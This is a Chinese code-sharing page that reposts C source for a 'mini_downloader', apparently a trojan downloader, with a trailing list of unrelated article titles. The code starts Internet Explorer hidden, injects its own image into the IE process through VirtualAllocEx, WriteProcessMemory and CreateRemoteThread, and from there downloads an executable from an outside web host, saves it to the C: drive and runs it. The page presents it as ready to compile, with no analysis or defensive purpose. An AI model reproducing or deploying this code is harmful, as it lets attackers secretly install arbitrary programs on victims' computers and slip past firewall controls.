穿越下载者VC源码 全文
来源:互联网 发布:linux gedit显示行号 编辑:程序博客网 时间:2024/04/27 08:38
/* "mini_downloader" compile by vc++ 6.0 can not run under win98; */ #include <windows.h> #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") //#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小 //#pragma comment(linker, "/merge:.data=.text") //#pragma comment(linker, "/merge:.rdata=.text") //#pragma comment(linker, "/align:0x200") #pragma comment(linker, "/ENTRY:main") #pragma comment(linker, "/subsystem:windows") #pragma comment(linker, "/BASE:0x13150000") HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数 DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数 HANDLE processhandle; DWORD pid; HINSTANCE hshell,hurlmon; void download() //注入使用的下载函数 { hshell=LoadLibrary("Shell32.dll"); hurlmon=LoadLibrary("urlmon.dll"); (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA"); (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA"); DOWNFILE(NULL,"http://www.sitedir.com.cn/notepad.exe","c:\\ieinst12.exe",0, NULL); SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5); ExitProcess(0); }; void main() //主函数 { //1.得到IE路径,并运行 char iename[MAX_PATH],iepath[MAX_PATH]; ZeroMemory(iename,sizeof(iename)); ZeroMemory(iepath,sizeof(iepath)); GetWindowsDirectory(iepath,MAX_PATH); strncpy(iename,iepath,3); strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); //strcat(iename,"windows\\notepad.EXE"); WinExec(iename,SW_HIDE); Sleep(500); //2.得到 IE process handle HWND htemp; htemp=FindWindow("IEFrame",NULL); GetWindowThreadProcessId(htemp,&pid); processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); //3.分配内存 HMODULE Module; LPVOID NewModule; DWORD Size; LPDWORD lpimagesize; Module = GetModuleHandle(NULL);//进程映像的基址 //得到内存镜像大小 _asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置 //4.写内存,创建线程 WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据 LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 //5.关闭对象 CloseHandle(processhandle); return; }
- 穿越下载者VC源码 全文
- VC++/MFC 源码下载
- VC++网上下载HTML源码
- VC无进程木马下载器源码
- MFC/VC++自绘菜单下载源码
- QQ《穿越火线 》快速下载
- VC 下载者
- VC 下载者
- 如何下载论文全文
- NIPS 全文下载
- C++下载者源码
- 【转自koma】 VC无进程木马下载器源码
- docin转swf(vc源码)修正,更新下载!
- 穿越
- 穿越
- 中国专利全文下载的方法
- 全文专利 PDF 免费下载
- CNKI PDF全文下载脚本
- C# 利用JQuery调用后台方法
- jqgrid 简单学习笔记
- Dom笔记6:Dom的动态创建
- 在Trufun bacon中进行需求分解操作秘笈
- 现在可用:Workflow Foundation Activity Pack for Windows Azure CTP 1
- 穿越下载者VC源码 全文
- Source Insight常用操作总结(持续补充中)
- RAD Studio XE2试用体验(1)
- 我在1
- 面向对象设计原则
- 颜色直方图
- HDU3523 Image copy detection 最小权匹配KM 2010 ACM-ICPC Multi-University Training Contest(9)——Host by HNU
- ExpandableListView 功能界面布局探究之一 ( 更换ExpandableListView右边的箭头(小图标))
- 数字逻辑芯片大全
